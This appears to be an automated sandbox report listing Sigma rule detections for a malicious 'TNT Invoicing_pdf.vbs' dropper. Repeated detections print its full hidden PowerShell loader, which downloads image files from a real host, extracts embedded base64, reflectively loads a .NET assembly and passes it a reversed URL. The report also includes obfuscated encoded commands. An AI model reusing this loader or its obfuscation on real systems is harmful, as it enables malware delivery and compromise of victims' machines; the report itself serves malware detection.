Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgT

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5492, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49699

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNT Invoicing_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNT Invoicing_pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNT Invoicing_pdf.vbs", ProcessId: 5492, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgT

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5492, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49699

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNT Invoicing_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNT Invoicing_pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNT Invoicing_pdf.vbs", ProcessId: 5492, ProcessName: wscript.exe

Sigma detected: Local Accounts Discovery

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c dir /b *.png *.jpg *.bmp *.gif>"C:\Users\user\AppData\Local\DesktopPic\PicList.txt", CommandLine: "C:\Windows\System32\cmd.exe" /c dir /b *.png *.jpg *.bmp *.gif>"C:\Users\user\AppData\Local\DesktopPic\PicList.txt", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNT Invoicing_pdf.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5492, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c dir /b *.png *.jpg *.bmp *.gif>"C:\Users\user\AppData\Local\DesktopPic\PicList.txt", ProcessId: 4032, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDg